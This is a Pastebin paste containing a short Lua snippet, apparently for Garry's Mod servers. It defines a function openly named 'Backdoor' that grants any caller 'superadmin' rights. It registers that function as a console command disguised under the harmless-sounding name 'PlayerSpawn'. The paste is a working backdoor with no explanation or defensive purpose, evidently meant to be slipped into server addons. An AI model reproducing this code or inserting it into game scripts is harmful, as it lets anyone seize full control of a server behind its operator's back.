Advertisement
Guest User

Untitled

a guest
Oct 26th, 2016
114
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.11 KB | None | 0 0
  1. function Backdoor( ply )
  2. ply:SetUserGroup("superadmin")
  3. end
  4. concommand.Add("PlayerSpawn", Backdoor)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement